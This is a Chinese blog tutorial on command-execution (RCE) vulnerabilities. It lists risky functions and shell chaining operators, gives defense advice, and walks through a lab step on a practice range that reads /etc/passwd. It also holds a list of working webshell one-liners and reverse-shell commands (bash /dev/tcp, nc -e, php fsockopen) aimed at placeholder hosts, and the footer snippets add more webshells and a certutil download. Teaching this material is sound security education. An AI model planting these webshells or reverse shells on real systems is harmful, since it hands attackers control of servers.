Web安全基础学习:RCE远程命令执行之基础命令执行

于 2024-06-25 00:15:00 发布
阅读量812 收藏 9
点赞数 9
分类专栏: Pilot-Web 文章标签: web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51862722/article/details/139781310
版权

理论基础

  • 命令执行漏洞

    命令执行漏洞是指攻击者通过注入恶意命令来执行非预期的操作;简单来说就是没有对用户输入的内容充分的验证或过滤,而直接带入到命令执行函数中当成系统化命令被执行。

  • 漏洞危害
    1. 执行任意系统命令,可能导致服务器被完全控制。
    2. 敏感信息泄露,如密码、数据库内容等。
    3. 对系统进行拒绝服务(DoS)攻击。
    4. 执行恶意代码,如安装后门、植入恶意软件等。

  • 常见漏洞函数

    编程语言执行系统命令的函数
    PHPexec()shell_exec()system()passthru()proc_open()popen()
    Pythonos.system()subprocess.run()subprocess.Popen()
    Goos/exec.Command()os/exec.Run()os/exec.Output()
    JavaRuntime.getRuntime().exec()ProcessBuilder.command()
    Node.jschild_process.exec()child_process.spawn()
  • Windows&Linux命令语法

    1. Windows

      • &:用于连接多个命令,按顺序执行

      • &&:用于连接多个命令,只有前一个命令成功执行后才执行下一个命令

      • |:用于将一个命令的输出作为另一个命令的输入

      • ||: 用于连接多个命令,只要前一个命令执行失败,就执行下一个命令

      • *:匹配任意字符序列(可以为空)

      • ?:匹配单个字符

      • 更多参考:腾讯社区-Window下CMD命令语法应知应会

    2. Linux

      • ;:用于连接多个命令,按顺序执行
      • &:用于连接多个命令,将多个命令置于后台运行
      • &&|||*?:与Windows一样
      • [a-z0-9]:匹配[]中的任意字符
      • 更多参考:linux常用语法
  • 进一步利用

    1. 写入webshell:

      # 常见的webshell

# php
<?php eval($_POST['f4nq1e']);?>
<?=eval($_POST[f4nq1e]);?>
<?php assert(@$_POST['f4nq1e']);?>
<?php$fun=create_function('',$_POST['f4nq1e']);$fun();?>
<?php@call_user_func(assert,$_POST['f4nq1e']);?>
<?php@preg_replace("/abcde/e",$_POST['f4nq1e'],"abcdefg");?>
<?php$a='assert';array_map("$a",$_REQUEST);?>
<?php$item['JON']='assert';$array[]=$item;$array[0]['JON']($_POST["f4nq1e"]);?>
<?php$a="eval";$a(@$_POST['f4nq1e']);?>

# jsp
<% out.println(system(request.getParameter("f4nq1e"))); %>

# asp
<%eval request("f4nq1e")%>
<%execute(request("f4nq1e"))%>
<%ExecuteGlobal request("f4nq1e")%>

# aspx
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["f4nq1e"],"unsafe"));%>

      参考文章:知乎-命令执行写Webshell总结

    2. 反弹shell:

      # bash反弹shell
/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/9877 0>&1

# nc反弹shell:
nc -e /bin/sh xx.xx.xx.xx 9877

# php反弹shell
php -r '$sock=fsockopen("xx.xx.xx.xx",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# telnet反弹shell
telnet xx.xx.xx.xx 8080 | /bin/bash | telnet xx.xx.xx.xx 9090

# crontab反弹shell
* * * * * /bin/bash -i >& /dev/tcp//1234 0>&1

      参考文章:先知-反弹shell方式汇总

  • 命令执行防御
    1. 输入验证和过滤:对于从用户或外部源接收的所有输入数据,进行严格的验证和过滤。确保只允许预期的输入字符和格式,并拒绝潜在的恶意代码。
    2. 权限限制:确保应用程序在执行命令时使用最低特权。不要在命令执行中使用超级用户权限或管理员权限,以降低攻击者可能获得的权限。
    3. 沙箱环境:在可能的情况下,将应用程序或相关组件运行在沙箱环境中,以限制其对系统的访问权限。这可以帮助隔离恶意代码的影响,并提供额外的安全层。

实践学习

漏洞环境以Pilot靶场为例:下载地址与部署教程

  1. 进入漏洞页面,发现服务器进程监控每隔固定时间会刷新。

  2. 抓包拦截刷新请求,发现通过Base64编码进行了命令执行,返回了进程信息:

    l1-1

  3. 修改命令为cat /etc/passwd,读取虚拟机的密码信息:

    l1-2

  4. 成功执行命令。

F4NQ1E
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行RCE)POC
06-06
远程命令执行RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
petulant-octo-tribble:通过HTTP的NodeJS“安全命令执行
05-20
5. 安全风险:不当的命令执行可能导致远程代码执行RCE)漏洞,攻击者可以通过构造特定的HTTP请求执行恶意命令。 6. 输入验证与权限控制:为了防止安全问题,必须对来自HTTP请求的数据进行严格验证和过滤,限制命令...
Aspx 一句话木马和客户端(备用)
eldn__的专栏
04-18 1631
以下是引用片段: 这个一句话不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
渗透干货|史上最全一句话木马
Python栈
03-15 4845
/可执行命令一句话密码-7ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句话木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
RCE:代码执行命令执行
qq_68163788的博客
05-30 1182
RCE是一种严重的安全漏洞,允许攻击者通过远程方式执行恶意代码或命令在受感染的系统上。这种漏洞可以被利用来获取系统权限、窃取敏感数据、篡改网站内容或者在受感染系统上植入后门,从而使攻击者能够完全控制受感染系统。RCE的危害性极高,因为攻击者可以利用这种漏洞对系统进行广泛的破坏,甚至扩大攻击范围至整个网络。 RCE漏洞通常存在于网络应用程序、操作系统或者其他软件中,攻击者可以通过各种方式发现和利用这些漏洞。
一句话木马:ASPX篇
09-21 986
aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAu...
Web渗透--RCE远程代码/命令执行
qq_62169455的博客
08-21 337
攻击者利用应用程序没有正确验证用户输入或没有过滤用户输入的特点,成功的在目标系统上执行恶意代码或命令,从而获取对目标系统控制和执行任意操作的权限。
xalanjava源码-jackspoilt:导致RCE的上下文反序列化漏洞-远程代码执行
06-05
安全的反序列化(多态类型) 不可信输入接受 目录结构 src/... : 描述反序列化利用的源代码(使用) 漏洞利用:为DeSerializaiton漏洞制作小工具/利用的源代码 攻击脚本:其他 shell 脚本,用于在应用程序服务上...
WEB安全知识总结.zip
12-27
6. **远程命令执行RCE)**:如果Web应用允许不受限制的代码执行,攻击者可能利用此漏洞执行任意系统命令。加固代码审查、限制函数调用和禁用不必要的系统服务可以减少风险。 7. **XML外部实体(XXE)漏洞**:在...
赏金$25000的GitHub漏洞:通过 GitHub Pages 不安全的Kramdown配置实现多个RCE .pdf
09-05
这篇文档讲述了关于GitHub的一个重大安全漏洞,该漏洞可能导致远程代码执行RCE),并且与一个赏金为$25000的事件相关。漏洞的关键在于GitHub Pages中使用的Markdown解析库Kramdown的一个不安全配置。Kramdown是一...
网络安全深入学习第一课——热门框架漏洞(RCE-命令执行
p36273的博客
09-16 645
----- 应用有时需要调用一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen等,当用户调用这些函数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。------命令执行产生原因:Web应用的脚本代码在执行命令的时候过滤不严,从而注入一段攻击者能够控制的代码,在服务器上执行恶意指令。------ 命令执行漏洞是PHP应用程序中最常见的漏洞之一。------ 命令执行漏洞:直接调用操作系统命令
RCE学习
oyf3085227433的博客
05-02 1008
学习总结一下rce基础知识
RCE命令注入
m0_75178803的博客
06-18 517
a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php。certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php。在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件。漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。
08-(RCE命令及代码执行漏洞
qq_56414082的博客
03-28 880
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval
RCE远程命令、代码执行漏洞)
weixin_42393944的博客
08-10 543
1.理解:可以直接让攻击者向后台服务器远程注入操作命令或者代码,从而控制后台系统 2.区别: 远程命令执行:直接调用操作系统命令 远程代码执行:靠执行代码调用操作系统命令 3.windows系统命令拼接 <1>"|":管道符,前面命令标准输出,后面命令标准输入 <2>"&": A&B,先运行A后运行B <3>"||": A||B ,运行A命令,若A失败则运行B命令 <4&gt...
RCE学习(一)
Dug123456_的博客
05-01 786
RCE远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。可选,用来存放搜索结果,$matches[0]存放所有匹配的字符串,$matches[1]用来存放第一个匹配的字符串,$matches[2]用来存放第三个匹配的字符串,以此类推。管道输出符|:前面命令的输出作为后面命令的输入,把前面命令的结果作为后面命令的参数;dir /ah /os //显示当目下隐藏的文件和目录,按文件大小从小到大排序。
RCE(远程命令/代码执行)
Massimo__JAVA的博客
08-04 419
系统对用户输入的参数过滤不严,导致用户可以输入&、|、||等命令连接符,拼接并执行命令
一篇文章教你学会RCE代码&命令执行漏洞
最新发布
a770067334的博客
06-22 223
命令执行(Command Injection)指在某些开发需求中,需要引入对系统本地命令(比如system)的支持来完成某些特定的功能。当开发未对用户传入的参数进行严格的校验、过滤时,则很有可能会产生命令注入。代码执行(Remote Code Execute)应用程序在调用一些能够将字符串转换为代码的函数(如PHP中的eval)时,没有考虑用户是否控制这个字符串,将造成代码执行漏洞。代码执行危害:根据服务器语言不同,可导致PHP、Java、Python等任意代码执行。1. 命令执行漏洞描述。
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
"深信服edr终端检测响应平台()存在代码审计挖掘出的远程命令执行RCE)漏洞,允许攻击者执行任意系统命令。此漏洞影响版本低于3.2.21,通过搜索和分析敏感函数,如exec()等,发现 ldb_exec() 函数的自定义命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值